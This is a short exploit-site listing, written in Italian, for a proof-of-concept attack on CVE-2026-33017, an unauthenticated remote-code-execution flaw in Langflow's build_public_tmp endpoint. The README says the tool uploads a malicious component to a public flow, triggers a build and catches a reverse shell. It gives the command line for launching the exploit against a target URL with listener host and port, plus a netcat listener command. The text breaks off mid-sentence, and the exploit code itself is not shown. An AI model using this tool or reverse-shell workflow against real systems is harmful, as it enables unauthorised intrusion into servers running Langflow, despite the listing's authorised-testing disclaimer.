Sploitus

Exploit for CVE-2026-33017-Langflop

kitploit · 2026-08-28

Exploit Code

MARKDOWN32 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TATOSEC-CVE-2026-33017-LANGFLOP
# CVE-2026-33017 Langflow ("Langflop") PoC di RCE non autenticata

PoC per la falla di esecuzione di codice non autenticata `build_public_tmp` in Langflow. Carica un componente dannoso in un flusso pubblico, attiva una build e cattura una reverse shell.

**Solo per test di sicurezza autorizzati.** Utilizza esclusivamente su sistemi che possiedi o per i quali hai esplicita autorizzazione al test.

## Requisiti

  * Python 3
  * `requests` (`pip install requests`)



## Utilizzo

Avvia il listener integrato e lancia l'exploit in un colpo solo:

root@kitploit:~
    
    
    python3 poc.py \
      --url https://target:7860 \
      --flow-id <public-flow-uuid> \
      --lhost <your-ip> \
      --lport 4444 \
      --listen
    

Quando la shell si connette, tenta automaticamente di effettuare l'upgrade a una shell completamente interattiva.

Se preferisci usare il tuo listener (es. `nc -lvnp 4444`), rimuovi :